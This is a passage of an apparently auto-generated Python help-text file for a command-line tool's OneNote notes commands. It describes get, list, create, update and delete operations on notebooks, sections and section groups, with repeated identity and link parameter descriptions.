using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from sites" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from sites" """ helps['notes get-section'] = """ type: command short-summary: "Get sections from sites" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from sites" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from sites" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from sites" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in sites" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property sections for sites" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for sites" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-section'] = """ type: command short-summary: "Get sections from sites" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from sites" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from sites" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from sites" """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in sites" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property onenote for users" """ helps['notes get-onenote'] = """ type: command short-summary: "Get onenote from users" """ helps['notes update-onenote'] = """ type: command short-summary: "Update the navigation property onenote in users" parameters: - name: --resources short-summary: "The image and other file resources in OneNote pages. Getting a resources collection is not \ supported, but you can get the binary content of a specific resource. Read-only. Nullable." long-summary: | Usage: --resources content=XX content-url=XX self=XX id=XX content: The content stream content-url: The URL for downloading the content self: The endpoint where you can get details about the page. Read-only. id: Read-only. Multiple actions can be specified by using more than one --resources argument. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property sections for users" """ helps['notes create-notebook'] = """ type: command short-summary: "Create new navigation property to notebooks for users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes create-operation'] = """ type: command short-summary: "Create new navigation property to operations for users" parameters: - name: --error short-summary: "onenoteOperationError" long-summary: | Usage: --error code=XX message=XX code: The error code. message: The error message. """ helps['notes create-page'] = """ type: command short-summary: "Create new navigation property to pages for users" """ helps['notes create-resource'] = """ type: command short-summary: "Create new navigation property to resources for users" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for users" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-notebook'] = """ type: command short-summary: "Get notebooks from users" """ helps['notes get-operation'] = """ type: command short-summary: "Get operations from users" """ helps['notes get-page'] = """ type: command short-summary: "Get pages from users" """ helps['notes get-resource'] = """ type: command short-summary: "Get resources from users" """ helps['notes get-section'] = """ type: command short-summary: "Get sections from users" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from users" """ helps['notes list-notebook'] = """ type: command short-summary: "Get notebooks from users" """ helps['notes list-operation'] = """ type: command short-summary: "Get operations from users" """ helps['notes list-page'] = """ type: command short-summary: "Get pages from users" """ helps['notes list-resource'] = """ type: command short-summary: "Get resources from users" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from users" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from users" """ helps['notes update-notebook'] = """ type: command short-summary: "Update the navigation property notebooks in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-operation'] = """ type: command short-summary: "Update the navigation property operations in users" parameters: - name: --error short-summary: "onenoteOperationError" long-summary: | Usage: --error code=XX message=XX code: The error code. message: The error message. """ helps['notes update-page'] = """ type: command short-summary: "Update the navigation property pages in users" """ helps['notes update-resource'] = """ type: command short-summary: "Update the navigation property resources in users" """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in users" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property sections for users" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for users" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-section'] = """ type: command short-summary: "Get sections from users" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from users" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from users" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from users" """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in users" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for users" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for users" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from users" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from users" """ helps['notes get-section'] = """ type: command short-summary: "Get sections from users" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from users" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from users" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from users" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For 